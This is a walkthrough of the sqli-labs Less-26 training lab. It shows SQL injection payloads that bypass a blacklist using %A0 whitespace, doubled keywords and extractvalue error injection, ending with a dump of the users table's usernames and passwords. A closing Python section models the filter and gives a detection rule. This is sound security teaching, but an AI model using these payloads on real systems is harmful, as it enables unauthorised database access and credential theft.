Bypass methods
1. Use a + sign instead of a space
2. Use URL encoding in place of the space character:
Space -------------------------- %20
TAB 0x09 horizontal tab -------- %09
LF 0x0A newline ---------------- %0A
FF 0x0C form feed -------------- %0C
CR 0x0D carriage return -------- %0D
0xA0 (MySQL only) -------------- %A0
# Case demonstration (URL encoding bypass)
sqli-labs-master/Less-26/
Viewing the source code: this level applies a blacklist filter, and the code shows that the filter is very strict.
1. Determine whether there is an injection point
First we pass a parameter in the URL; the page echoes normally.
Throwing in a random symbol makes the page report an error:
''1'' LIMIT 0,1' at line 1
'1'' LIMIT 0,1
The single quote is what we typed, so the closing method is a single quotation mark.
url: ?id=1' and 1=1 #
Judging from what the page echoes back, the spaces, the "and" and the # sign we entered have been filtered out.
We originally entered 1' and 1=1 #, and after filtering the data becomes 1'1=1.
Bypass idea:
Replace the space with its URL encoding, %A0.
Use double writing to get past the keyword filter: anandd (the filter removes "and" once, and what remains is "and").
Replace the comment with manual closing: use ' to close the statement.
The original URL statement, which does not work:
?id=1' anandd '1'='1
The URL bypass statement:
?id=1'%A0anandd%A0'1'='1
The page is normal.
As the blue part shows, the space we entered in the URL was carried into the query.
The original URL statement, which does not work:
?id=1' anandd '1'='2
The URL bypass statement:
?id=1'%A0anandd%A0'1'='2
The page errors, so there is an injection point.
2. Determine the number of fields
For sqli-labs-master/Less-26, group by can still be used: keep increasing the count while the page still echoes normally.
Here we instead use union select 1,2,3,... to count the fields.
url: ?id=1'%A0union%A0select%A01,2%A0anandd%A0'1'='1
page error
url: ?id=1'%A0union%A0select%A01,2,3%A0anandd%A0'1'='1
With 3, the page echoes normally, so there are three fields in total.
3. Determine which fields are displayed
url: ?id=-1'%A0union%A0select%A01,2,3%A0anandd%A0'1'='1
The blue part shows that the - sign we entered was filtered: we sent ?id=-1, and after filtering it became ?id=1, so we cannot tell which fields are displayed.
url: ?id=0'%A0union%A0select%A01,2,3%A0anandd%A0'1'='1
Since the - sign is filtered, we write 0 instead. The query runs in the database and the page echoes normally, which shows that fields 1 and 2 are displayed on the page.
4. Determine the database name
?id=0'%A0union%A0select%A01,(database()),3%A0anandd%A0'1'='1
The page echoes the database name: security.
5. Get the data table
url:
?id=0'%A0union%A0select%A01,(select%A0group_concat(table_name)
from%A0infoorrmation_schema.tables%A0where%A0table_schema=database()),
3%A0anandd%A0'1'='1
The data tables are:
emails,referers,uagents,users
6. Get all the fields of the users data table
url:
?id=0'%A0union%A0select%A01,(select%A0group_concat(column_name)
from%A0infoorrmation_schema.columns%A0where%A0table_schema=database()%A0ANandD%A0table_name='users'),
3%A0anandd%A0'1'='1
The fields are:
id,username,password
7. Dump the data
url:
?id=0'%A0union%A0select%A01,(select%A0group_concat(username,'^^',passwoorrd)from%A0security.users),3%A0ANANDD'1'='1
In some scenarios spaces are filtered so strictly that there is no way through at all; then we can use error-based injection to bypass the filter without writing any spaces.
# Case demonstration (error injection bypass)
sqli-labs-master/Less-26/
Get the database
?id=0'||extractvalue(1,concat('~',database()))||'1'='1
Analysis
Write a non-existent id and use || (or) for the test; the query returns when the following condition is met, and finally ||'1'='1 closes the statement.
||'1'='1 is the same as or '1'='1 and is there only for closure!
The current database is security.
Get the data table names
?id=0'||extractvalue(1,concat('~',(select(group_concat(table_name))
from(infoorrmation_schema.tables)where(table_schema=database()))))||'1'='1
Note that spaces cannot be used here; they must be replaced with parentheses.
The error message shows '~emails,referers,uagents,users', so those are the data tables.
Get the field information of the users data table
?id=0'||extractvalue(1,concat('~',(select(group_concat(column_name))
from(infoorrmation_schema.columns)where(table_schema=database())
anandd(table_name='users'))))||'1'='1
The error message shows id,username,password', so there are three fields.
Dump the database
?id=0'||extractvalue(1,concat('~',
(substr((select(group_concat(username,':',passwoorrd))from(security.users)),1,30))))||'1'='1
Error injection reference
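As an added defender-side example (not code from sqli-labs or this walkthrough), the following Python models the single-pass blacklist this level appears to use (an assumed reconstruction from the filtering behaviour observed above) and shows why it fails: MySQL accepts %A0 and the other listed bytes as token separators, and a one-pass filter lets anandd through. The names normalize, filter_to_fixpoint and is_suspicious are hypothetical; the detection rule flags both the %A0/doubling form and the no-space ||extractvalue( form from the two cases above, but the durable fix remains a parameterized query.

```python
import re
from urllib.parse import unquote

# Assumed reconstruction of a Less-26-style blacklist (not the lab's own code):
# each token is deleted in a single pass, which is what the walkthrough observes
# (anandd -> and, infoorrmation -> information, spaces, '-' and '#' vanish).
BLACKLIST = ["or", "and", "/*", "--", "#", " ", "-"]

def lab_filter(s: str) -> str:
    """One pass over the blacklist, as the lab appears to do."""
    for tok in BLACKLIST:
        s = s.replace(tok, "")
    return s

# Bytes MySQL accepts as token separators besides 0x20; %A0 is the one the
# walkthrough uses. A filter that only strips 0x20 never sees them.
MYSQL_WS = "\t\n\x0b\x0c\r\xa0"
WS_RE = re.compile("[ " + MYSQL_WS + "]+")

def normalize(raw_param: str) -> str:
    """URL-decode as latin-1 (so %A0 survives) and fold every MySQL
    whitespace byte to a single 0x20 before any keyword check."""
    s = unquote(raw_param, encoding="latin-1")
    return WS_RE.sub(" ", s).lower()

def filter_to_fixpoint(s: str) -> str:
    """Re-apply the blacklist until nothing changes, so doubled keywords collapse."""
    while (t := lab_filter(s)) != s:
        s = t
    return s

def is_suspicious(raw_param: str) -> bool:
    """Detection rule for the bypasses shown in the walkthrough:
    - the parameter carries a non-0x20 MySQL whitespace byte;
    - one-pass and fixed-point filtering disagree (keyword stuffing);
    - a quote is followed by ||, &&, union or extractvalue( (no-space form)."""
    decoded = unquote(raw_param, encoding="latin-1")
    n = normalize(raw_param)
    odd_ws = any(c in MYSQL_WS for c in decoded)
    stuffed = filter_to_fixpoint(n) != lab_filter(n)
    operators = re.search(r"'\s*(\|\||&&|union\b|extractvalue\s*\()", n) is not None
    return odd_ws or stuffed or operators

# Constructed sample values of the id parameter, shaped like the walkthrough's requests
SAMPLES = {
    "1": False,
    "1'%A0anandd%A0'1'='1": True,
    "0'||extractvalue(1,concat('~',database()))||'1'='1": True,
    "O'Brien": False,
}

if __name__ == "__main__":
    for p, expected in SAMPLES.items():
        print(p, "->", is_suspicious(p), "(expected", expected, ")")
```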